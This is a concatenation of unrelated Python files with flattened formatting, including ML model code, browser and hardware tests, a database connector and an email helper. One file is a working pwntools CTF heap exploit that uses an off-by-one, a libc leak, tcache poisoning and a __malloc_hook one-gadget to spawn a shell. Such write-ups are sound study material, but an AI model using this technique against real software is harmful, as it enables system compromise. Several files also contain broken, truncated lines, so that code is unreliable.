Validate unit test result file can be read. :param path: Path to the example output """ with"r") as results: rdr = csv.reader(results) outcomes = (float(row[10]) for row in rdr) first = next(outcomes) sum_0, sum_1 = 1, first value_min = value_max = first for value in outcomes: sum_0 += 1 # value**0 sum_1 += value # value**1 value_min = min(value_min, value) value_max = max(value_max, value) mean = sum_1 / sum_0 print( f"{path}\nMean = {mean:.1f}\n" f"House Edge = { 1 - mean / 50:.1%}\n" f"Range = {value_min:.1f} {value_max:.1f}" )
<gh_stars>100-1000 #!/usr/bin/env python3 # Copyright (c) 2020 Graphcore Ltd. All rights reserved. import pytest import torch import poptorch def harness(setting, Model, args): opts = poptorch.Options() if setting == "true": opts.Precision.enableFloatingPointExceptions(True) elif setting == "false": opts.Precision.enableFloatingPointExceptions(False) poptorch_model = poptorch.inferenceModel(Model(), opts) if setting == "true": with pytest.raises(poptorch.Error): poptorch_model(*args) else: poptorch_model(*args) @pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(), reason="Floating point exception not supported on model") @pytest.mark.parametrize("setting", {"default", "true", "false"}) def test_div0(setting): class Model(torch.nn.Module): def forward(self, x, y): return x / y x = torch.ones(10, 10) y = torch.zeros(10, 10) harness(setting, Model, [x, y]) @pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(), reason="Floating point exception not supported on model") @pytest.mark.parametrize("setting", {"default", "true", "false"}) def test_mul0inf(setting): class Model(torch.nn.Module): def forward(self, x, y): return x * y x = torch.zeros(10, 10) y = torch.div(torch.ones(10, 10), torch.zeros(10, 10)) harness(setting, Model, [x, y]) @pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(), reason="Floating point exception not supported on model") @pytest.mark.parametrize("setting", {"default", "true", "false"}) def test_nonreal(setting): class Model(torch.nn.Module): def forward(self, x): return torch.sqrt(x) x = torch.Tensor([-1, -2]) harness(setting, Model, [x]) @pytest.mark.parametrize("setting", {"default", "true", "false"}) @pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(), reason="Floating point exception not supported on model") def test_nan(setting): class Model(torch.nn.Module): def forward(self, x, y): return x > y x = torch.ones(10, 10) y = torch.div(torch.zeros(10, 10), torch.zeros(10, 10)) harness(setting, Model, [x, y]) @pytest.mark.parametrize("setting", {"default", "true", "false"}) @pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(), reason="Floating point exception not supported on model") def test_ovf(setting): class Model(torch.nn.Module): def forward(self, x): return torch.exp(x) x = torch.Tensor([3800, 4203]) harness(setting, Model, [x])
<filename>tests/acceptance/ # MIT License # # Copyright (c) 2015-2021 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import os from selene import have from import browser from tests.integration.helpers.givenpage import GivenPage empty_page = 'file://{}/../resources/empty.html'.format( os.path.abspath(os.path.dirname(__file__)) ) def setup_function(): browser.quit() def teardown_function(): browser.config.browser_name = 'chrome' browser.quit() def test_can_init_default_browser_on_visit(): GivenPage(browser.driver).opened_with_body( ''' <h1 id="header">Selene</h1>''' ) browser.element("#header").should(have.exact_text("Selene")) assert == 'chrome' def test_can_init_custom_browser_on_visit(): browser.config.browser_name = 'firefox' GivenPage(browser.driver).opened_with_body( ''' <a id="selene_link">Selene site</a> ''' ) browser.element("#selene_link").should(have.exact_text("Selene site")) assert == 'firefox' def test_can_init_default_browser_after_custom(): GivenPage(browser.driver).opened_with_body( ''' <h1 id="header">Selene</h1> ''' ) browser.element("#header").should(have.exact_text("Selene")) assert == 'chrome'
""" This module implements connections for CUBRIDdb. Presently there is only one class: Connection. Others are unlikely. However, you might want to make your own subclasses. In most cases, you will probably override Connection.default_cursor with a non-standard Cursor class. """ from CUBRIDdb.cursors import * import types, _cubrid class Connection(object): """CUBRID Database Connection Object""" def __init__(self, *args, **kwargs): 'Create a connecton to the database.' self.charset = '' kwargs2 = kwargs.copy() self.charset = kwargs2.pop('charset', 'utf8') self.connection = _cubrid.connect(*args, **kwargs2) def __del__(self): pass def cursor(self, dictCursor = None): if dictCursor: cursorClass = DictCursor else: cursorClass = Cursor return cursorClass(self) def set_autocommit(self, value): if not isinstance(value, bool): raise ValueError("Parameter should be a boolean value") if value: switch = 'TRUE' else: switch = 'FALSE' self.connection.set_autocommit(switch) def get_autocommit(self): if self.connection.autocommit == 'TRUE': return True else: return False autocommit = property(get_autocommit, set_autocommit, doc = "autocommit value for current Cubrid session") def commit(self): self.connection.commit() def rollback(self): self.connection.rollback() def close(self): self.connection.close() def escape_string(self, buf): return self.connection.escape_string(buf)
# Python program to Find the Sum of Digits of a Number def sum_of_digits(num): # Extracting Each digits # and compute thier sum in 's' s = 0 while num != 0: s = s + (num % 10) num = num // 10 return s if __name__ == '__main__': # Input the number And # Call the function print("Enter the number: ", end="") n = int(input()) S = sum_of_digits(abs(n)) print("The sum of digits of the given number is {}.".format(S)) ''' Time Complexity: O(log(num)), where "num" is the length of the given number Space Complexity: O(1) SAMPLE INPUT AND OUTPUT SAMPLE 1 Enter the number: -12 The sum of digits of the given number is 3. SAMPLE 2 Enter the number: 43258 The sum of digits of the given number is 22. '''
#!/usr/bin/env python # coding: utf-8 # __buildin__ modules import smtplib from email.mime.text import MIMEText from monitor.utils.settings import EMAIL_SERVER from monitor.utils.settings import EMAIL_PORT from monitor.utils.settings import EMAIL_USER from monitor.utils.settings import EMAIL_PASS from monitor.utils.settings import EMAIL_FROM_ADDR from monitor.utils.email_list import EMAIL_LIST def _sendmail(to_list, subject, content): """ params: to_addr[list]: subject[str]: content[str]: plain content """ msg = MIMEText(content, 'plain', 'utf-8') msg['Subject'] = subject msg['From'] = EMAIL_FROM_ADDR msg['To'] = ', '.join(to_list) smtp = smtplib.SMTP_SSL() smtp.set_debuglevel(0) smtp.connect(EMAIL_SERVER, EMAIL_PORT) smtp.login(EMAIL_USER, EMAIL_PASS) smtp.sendmail(EMAIL_FROM_ADDR, to_list, msg.as_string()) smtp.quit() def sendmail(subject, content): """ params: subject[str]: content[str]: plain content """ if EMAIL_LIST: _sendmail(EMAIL_LIST, subject, content) else: raise ValueError('email list is empty')
<filename>pl_bolts/callbacks/ from contextlib import contextmanager from typing import Any, Dict, Optional, Sequence, Tuple, Union import torch from pytorch_lightning import Callback, LightningModule, Trainer from pytorch_lightning.utilities import rank_zero_warn from torch import Tensor, nn from torch.nn import functional as F from torch.optim import Optimizer from torchmetrics.functional import accuracy from pl_bolts.models.self_supervised.evaluator import SSLEvaluator class SSLOnlineEvaluator(Callback): # pragma: no cover """Attaches a MLP for fine-tuning using the standard self-supervised protocol. Example:: # your datamodule must have 2 attributes dm = DataModule() dm.num_classes = ... # the num of classes in the datamodule = ... # name of the datamodule (e.g. ImageNet, STL10, CIFAR10) # your model must have 1 attribute model = Model() model.z_dim = ... # the representation dim online_eval = SSLOnlineEvaluator( z_dim=model.z_dim ) """ def __init__( self, z_dim: int, drop_p: float = 0.2, hidden_dim: Optional[int] = None, num_classes: Optional[int] = None, dataset: Optional[str] = None, ): """ Args: z_dim: Representation dimension drop_p: Dropout probability hidden_dim: Hidden dimension for the fine-tune MLP """ super().__init__() self.z_dim = z_dim self.hidden_dim = hidden_dim self.drop_p = drop_p self.optimizer: Optional[Optimizer] = None self.online_evaluator: Optional[SSLEvaluator] = None self.num_classes: Optional[int] = None self.dataset: Optional[str] = None self.num_classes: Optional[int] = num_classes self.dataset: Optional[str] = dataset self._recovered_callback_state: Optional[Dict[str, Any]] = None def setup(self, trainer: Trainer, pl_module: LightningModule, stage: Optional[str] = None) -> None: if self.num_classes is None: self.num_classes = trainer.datamodule.num_classes if self.dataset is None: self.dataset = def on_pretrain_routine_start(self, trainer: Trainer, pl_module: LightningModule) -> None: # must move to device after setup, as during setup, pl_module is still on cpu self.online_evaluator = SSLEvaluator( n_input=self.z_dim, n_classes=self.num_classes, p=self.drop_p, n_hidden=self.hidden_dim, ).to(pl_module.device) # switch fo PL compatibility reasons accel = ( trainer.accelerator_connector if hasattr(trainer, "accelerator_connector") else trainer._accelerator_connector ) if accel.is_distributed: if accel.use_ddp: from torch.nn.parallel import DistributedDataParallel as DDP self.online_evaluator = DDP(self.online_evaluator, device_ids=[pl_module.device]) elif accel.use_dp: from torch.nn.parallel import DataParallel as DP self.online_evaluator = DP(self.online_evaluator, device_ids=[pl_module.device]) else: rank_zero_warn( "Does not support this type of distributed accelerator. The online evaluator will not sync." ) self.optimizer = torch.optim.Adam(self.online_evaluator.parameters(), lr=1e-4) if self._recovered_callback_state is not None: self.online_evaluator.load_state_dict(self._recovered_callback_state["state_dict"]) self.optimizer.load_state_dict(self._recovered_callback_state["optimizer_state"]) def to_device(self, batch: Sequence, device: Union[str, torch.device]) -> Tuple[Tensor, Tensor]: # get the labeled batch if self.dataset == "stl10": labeled_batch = batch[1] batch = labeled_batch inputs, y = batch # last input is for online eval x = inputs[-1] x = y = return x, y def shared_step( self, pl_module: LightningModule, batch: Sequence, ): with torch.no_grad(): with set_training(pl_module, False): x, y = self.to_device(batch, pl_module.device) representations = pl_module(x).flatten(start_dim=1) # forward pass mlp_logits = self.online_evaluator(representations) # type: ignore[operator] mlp_loss = F.cross_entropy(mlp_logits, y) acc = accuracy(mlp_logits.softmax(-1), y) return acc, mlp_loss def on_train_batch_end( self, trainer: Trainer, pl_module: LightningModule, outputs: Sequence, batch: Sequence, batch_idx: int, dataloader_idx: int, ) -> None: train_acc, mlp_loss = self.shared_step(pl_module, batch) # update finetune weights mlp_loss.backward() self.optimizer.step() self.optimizer.zero_grad() pl_module.log("online_train_acc", train_acc, on_step=True, on_epoch=False) pl_module.log("online_train_loss", mlp_loss, on_step=True, on_epoch=False) def on_validation_batch_end( self, trainer: Trainer, pl_module: LightningModule, outputs: Sequence, batch: Sequence, batch_idx: int, dataloader_idx: int, ) -> None: val_acc, mlp_loss = self.shared_step(pl_module, batch) pl_module.log("online_val_acc", val_acc, on_step=False, on_epoch=True, sync_dist=True) pl_module.log("online_val_loss", mlp_loss, on_step=False, on_epoch=True, sync_dist=True) def on_save_checkpoint(self, trainer: Trainer, pl_module: LightningModule, checkpoint: Dict[str, Any]) -> dict: return {"state_dict": self.online_evaluator.state_dict(), "optimizer_state": self.optimizer.state_dict()} def on_load_checkpoint(self, trainer: Trainer, pl_module: LightningModule, callback_state: Dict[str, Any]) -> None: self._recovered_callback_state = callback_state @contextmanager def set_training(module: nn.Module, mode: bool): """Context manager to set training mode. When exit, recover the original training mode. Args: module: module to set training mode mode: whether to set training mode (True) or evaluation mode (False). """ original_mode = try: module.train(mode) yield module finally: module.train(original_mode)
<reponame>S-HuaBomb/Contrib import random import networkx as nx import numpy as np class Zero(object): def __init__(self, hidden_size, **kwargs): self.hidden_size = hidden_size def train(self, G): return np.zeros((G.number_of_nodes(), self.hidden_size)) class FromNumpy(object): def __init__(self, hidden_size, emb_path, **kwargs): super(FromNumpy, self).__init__() self.hidden_size = hidden_size self.emb = np.load(emb_path) def train(self, G): id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())]) embeddings = np.asarray([self.emb[id2node[i]] for i in range(len(id2node))]) assert G.number_of_nodes() == embeddings.shape[0] return embeddings class FromNumpyGraph(FromNumpy): def train(self, G): assert G is None return self.emb class FromNumpyAlign(object): def __init__(self, hidden_size, emb_path_1, emb_path_2, **kwargs): self.hidden_size = hidden_size self.emb_1 = np.load(emb_path_1) self.emb_2 = np.load(emb_path_2) self.t1, self.t2 = False, False def train(self, G): if G.number_of_nodes() == self.emb_1.shape[0] and not self.t1: emb = self.emb_1 self.t1 = True elif G.number_of_nodes() == self.emb_2.shape[0] and not self.t2: emb = self.emb_2 self.t2 = True else: raise NotImplementedError id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())]) embeddings = np.asarray([emb[id2node[i]] for i in range(len(id2node))]) return embeddings
# ============================================= # -*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email : <EMAIL> # @File : # @Software: PyCharm # ============================================ import logging import tensorflow as tf import os from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename="./yolo4/logs/train.log", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = count = 0 for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type="GPU") if gpus:"use gpu device") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ["CUDA_VISIBLE_DEVICE"] = "-1""not found gpu device,convert to use cpu") else:"use cpu device") # 禁用gpu os.environ["CUDA_VISIBLE_DEVICE"] = "-1" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + "epoch-{}".format(fine_tune_epoch)) print("load {} epoch weigth".format(fine_tune)) else: fine_tune_epoch = -1 print("train model from init") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print("Epoch: {}/{}, step: {}/{} ,loss: {:.5f}".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + "epoch-{}".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + "epoch-{}".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo = BaseModel() yolo.train()
from .impl import ( BrokerHandler, ) from .ports import ( BrokerHandlerService, BrokerPort, )
#!/usr/bin/env python from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('', 8763) p = process('./program', env = {'LD_PRELOAD': './'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation of previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so we can re-allocate it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can be consolidated with chunk_2 later delete_heap(0) # when we free a chunk, programs writes 0xDA to the whole chunk # so, we need to zero out some parts of the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it always have chunk size of 0x71, but the program only cares # about the input size for i in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes null byte at the end of buffer. # when i == 0, off-by-one happens and turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i)) # we need to free the chunk, so malloc returns it on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping free chunk with chunk_1 # the resulting big chunk will be put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the unsorted bin for allocation, and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\n$$')[:-3] libc_base = u64(libc_addr + '\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which is due to double free # freeing chunk_1 and chunk_5 put them in the same bin in tcache # even though they are pointing to the same address delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be served from tcache and we will put the address of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at the head of the list, this allocation returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1, '', True) p.interactive()
#!/usr/bin/env python3 # a,b=map(int,input().split()) print(pow(a,b)-pow(b,a))
<reponame>plutoyuxie/mmgeneration<gh_stars>100-1000 # Copyright (c) OpenMMLab. All rights reserved. from copy import deepcopy from functools import partial import mmcv import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): """A sequential module that passes timestep embeddings to the children that support it as an extra input. Modified from """ def forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r"""Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function is also known as the swish function. Args: input (bool, optional): Use inplace operation or not. Defaults to `False`. """ def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \'SiLU\' is not supported for ' f'torch < 1.6.0, found \'{torch.version}\'.') self.inplace = inplace def forward(self, x): """Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. """ if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): """An attention block allows spatial position to attend to each other. Originally ported from here, but adapted to the N-d case. # noqa Args: in_channels (int): Channels of the input feature map. num_heads (int, optional): Number of heads in the attention. norm_cfg (dict, optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` """ def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): """Forward function for multi head attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention. """ b, c, *spatial = x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): """Time embedding layer, reference to Two level embedding. First embedding time by an embedding function, then feed to neural networks. Args: in_channels (int): The channel number of the input feature map. embedding_channels (int): The channel number of the output embedding. embedding_mode (str, optional): Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to None. act_cfg (dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. """ def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): """Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz, ]``, one per batch element. dim (int): The dimension of the embedding. max_period (int, optional): Controls the minimum frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. """ half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding =[torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): """Forward function for time embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. """ return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): """Resblock for the denoising network. If `in_channels` not equals to `out_channels`, a learnable shortcut with conv layers will be added. Args: in_channels (int): Number of channels of the input feature map. embedding_channels (int): Number of channels of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers. out_channels (int, optional): Number of output channels of the ResBlock. If not defined, the output channels will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut conv. Defaults to ``1``. """ def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): """Forward function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor : Output feature map tensor. """ shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def init_weights(self): # apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): """Nornalization with embedding layer. If `use_scale_shift == True`, embedding results will be chunked and used to re-shift and re-scale normalization results. Otherwise, embedding results will directly add to input of normalization layer. Args: in_channels (int): Number of channels of the input feature map. embedding_channels (int) Number of channels of the input embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer will be split to 'scale' and 'shift' and map the output of normalization layer to ``out * (1 + scale) + shift``. Otherwise, the output of Embedding layer will be added with the input before normalization operation. Defaults to True. """ def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): """Forward function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor : Output feature map tensor. """ embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x * (1 + scale) + shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): """Downsampling operation used in the denoising network. Support average pooling and convolution for downsample operation. Args: in_channels (int): Number of channels of the input feature map to be downsampled. with_conv (bool, optional): Whether use convolution operation for downsampling. Defaults to `True`. """ def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): """Forward function for downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling. """ return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): """Upsampling operation used in the denoising network. Allows users to apply an additional convolution layer after the nearest interpolation operation. Args: in_channels (int): Number of channels of the input feature map to be downsampled. with_conv (bool, optional): Whether apply an additional convolution layer after upsampling. Defaults to `True`. """ def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): """Forward function for upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling. """ x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x = self.conv(x) return x
from ._arpa_file_parser import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for name in dir() if name[0] != '_' and not name.endswith('Base')]
